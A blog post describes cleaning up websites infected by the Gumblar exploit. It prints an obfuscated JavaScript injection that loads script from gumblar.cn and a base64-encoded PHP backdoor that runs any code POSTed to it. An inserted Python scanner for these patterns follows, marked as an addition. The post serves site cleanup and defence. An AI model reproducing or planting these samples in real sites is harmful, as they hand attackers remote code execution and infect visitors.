May 27

DeWorm

Ouch, some of my sites were attacked by the Gumblar.cn exploit and blacklisted by Google.
What it does is inject malicious code into .html, .php, .aspx and .js files: usually a snippet of JavaScript in the header, right before the body tag, in .html and .aspx files, and at the bottom of .php and .js files. It also generates an image.php and a gifimg.php file in the images directory. It does this at random locations anywhere on the website. PC users visiting the site can be compromised.
The first thing to do is change the FTP password; a stronger password helps. Then it took me a long time to scrub through the sites, using scripts, search and replace, delete and FTP, to find and remove those scripts, and then about a day for Google to review the site again. Linux really helped in this case, since the cleanup can be done from the command line, but not so with PC servers, where each file had to be checked manually.

Some analysis…
Here is one sample of the various injections:
var maV3C='%';var nW5R='var"20a"3d"22Scri"70t"45"6eg"69ne"22"2cb"3d"22Ver"73ion()+"22"2cj"3d"22"22"2c"75"3dn"61vig"61tor
"2e"75serA"67e"6et"3bif"28(u"2ei"6edex"4f"66"28"22W"69n"22)"3e0"29"26"26"28"75"2ein"64"65xOf"28"22"4e"54"206"22)"3c0)"26"26("64ocument"2e
cookie"2ein"64"65xOf("22m"69ek"3d"31"22)"3c"30)"26"26(t"79peof("7arvz"74s)"21"3d"74"79"70"65of"28"22"41"22"29"29)"7bz"72v"7ats"3d"22A"22"
3bev"61"6c("22i"66"28win"64ow"2e"22+a+"22"29"6a"3dj+"22"2b"61"2b"22"4daj"6fr"22+b+a+"22Minor"22+b"2b"61"2b"22Bui"6cd"22+"62"2b"22j"3b"22"
29"3b"64ocu"6dent"2e"77"72"69te("22"3cscript"20s"72c"3d"2f"2f"67u"6dbl"61r"2ecn"2frs"73"2f"3fid"3d"22+"6a+"22"3e"3c"5c"2fscri"70"74"3e"22
)"3b"7d';eval(unescape(nW5R.replace(b5nxj,maV3C)))})(/"/g);

This is the backdoor script in the image.php or gifimg.php file:
eval(base64_decode('aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpO2VjaG8gJzM2MzQyYjMxMzgzNzJlMzIzMDMxMmUzMjMyMzUzYTdhNjk2MzZmNmM2MTNlNzA2NTc0NjQ3MjZjNjEnOw=='));

When decoded, here is the actual PHP script:
if(isset($_POST['e']))eval(base64_decode($_POST['e']));echo '36342b3138372e3230312e3232353a7a69636f6c613e70657464726c61';

As you can see, it lets anyone who can POST to that file run arbitrary PHP code on your server.
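A scanner for the two injection patterns shown above (the base64-wrapped PHP backdoor and the unescape-based JavaScript loader), added here as an example and not part of the original post. The file names, tag labels, the `scan_tree` walker and the sample inputs used in its checks are constructed assumptions; it is meant for the "scrub through the sites" step from a Linux command line.

```python
import base64
import os
import re
from urllib.parse import unquote

# Files the post says the dropper creates in the images directory.
SUSPECT_NAMES = {"image.php", "gifimg.php"}
# Markers visible in the raw file text without any decoding.
INDICATORS = [("eval(base64_decode(", "php-eval-b64"),
              ("eval(unescape(", "js-eval-unescape"),
              ("gumblar.cn", "gumblar-domain")]
B64_EVAL = re.compile(r"eval\(base64_decode\('([A-Za-z0-9+/=]+)'\)\)")
JS_LITERAL = re.compile(r"'([^']+)'")  # single-quoted JS string literals

def decode_php_layer(text):
    """Return the PHP hidden inside eval(base64_decode('...')), or None."""
    m = B64_EVAL.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("latin-1")
    except ValueError:
        return None

def decode_js_layers(text):
    """Yield each literal decoded as the loader does: replace(/"/g,'%') then unescape()."""
    for lit in JS_LITERAL.findall(text):
        if '"' in lit:  # the sample above uses '"' as the stand-in for '%'
            yield unquote(lit.replace('"', "%"))

def scan_file(path, text):
    """Return indicator tags for one file's content (empty list = nothing found)."""
    tags = ["suspect-filename"] if os.path.basename(path) in SUSPECT_NAMES else []
    tags += [tag for needle, tag in INDICATORS if needle in text]
    inner = decode_php_layer(text)
    if inner and "$_POST" in inner and "eval(" in inner:
        tags.append("remote-eval-backdoor")   # evaluates whatever is POSTed to it
    if any("gumblar.cn" in js for js in decode_js_layers(text)):
        tags.append("gumblar-domain-hidden")  # domain appears only after decoding
    return tags

def scan_tree(root, exts=(".html", ".php", ".aspx", ".js")):
    """Walk a web root and map each flagged file to its indicator tags."""
    hits = {}
    for d, _, files in os.walk(root):
        for p in (os.path.join(d, f) for f in files if f.endswith(exts)):
            with open(p, encoding="latin-1") as fh:
                tags = scan_file(p, fh.read())
            if tags:
                hits[p] = tags
    return hits
```

Run `scan_tree` against a copy of the web root and review every hit by hand before deleting, since a legitimate file can contain eval() too.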

Here is a list of links related to the Gumblar trojan:
Gumblar explode across the Web
Beware of the Gumblar Worm
PHP exploit on the loose
12 Facts about the Gumblar Exploit
Removal and Prevention of Gumblar

Hope this helps.
What a pain… and 2 days wasted for no reason.
